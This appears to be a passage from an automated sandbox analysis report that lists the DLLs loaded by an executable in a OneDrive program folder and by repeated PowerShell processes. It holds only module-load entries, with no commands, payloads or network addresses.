                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: version.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
